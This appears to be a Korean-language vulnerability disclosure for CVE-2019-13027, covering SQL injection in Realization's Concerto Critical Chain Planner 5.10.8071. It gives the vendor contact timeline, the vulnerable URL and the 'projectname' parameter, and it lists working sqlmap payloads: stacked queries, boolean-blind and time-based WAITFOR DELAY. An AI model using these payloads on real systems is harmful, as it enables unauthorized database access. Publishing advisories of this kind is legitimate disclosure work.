
CVE-2019-13027 공개를 위한 세부 정보
CVE-2019-13027 공개를 위한 세부 정보
공급업체 연락 타임라인: 2019년 7월 1일 -> 응답 없음, 이메일 회신 없음.
2019년 7월 4일 -> 응답 없음, 이메일 회신 없음.
2019년 7월 8일 -> 이메일 발송, Github 생성.
2019년 7월 11일 -> 공급업체 응답 없음. 취약점 공개.
[취약점 유형] SQL 인젝션 [영향을 받는 제품 코드 베이스] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - 버전: 5.10.8071 (5.x 브랜치의 다른 버전도 영향을 받을 가능성이 있음. 다른 브랜치는 테스트 불가)
[영향을 받는 구성 요소] Realization Concerto Critical Chain Planner (일명 CCPM) 5.10.8071에는 몇 가지 심각한 보안 문제가 있으며, 최소한 taskupdt/taskdetails.aspx 웹페이지에서 "projectname" 매개변수를 통해 SQL 인젝션이 가능합니다.
[공격 유형] 원격
[공격 벡터] 애플리케이션에는 다수의 반사형 XSS/CSRF(예: checklist/checklist에 존재)가 있지만, 까다로운 부분은 SQL 인젝션입니다. SQL Server 버전 및/또는 IDS/IPS에 따라 일부 변조가 필요합니다.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo)은 존재하고 유효해야 합니다. 나머지 매개변수를 퍼징하거나 실제 요청을 사용하십시오. foo에도 XSS가 존재합니다.
탐지된 SQL (SQLMAP의 페이로드) Parameter: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[제품 공급업체] REALIZATION - https://www.realization.com/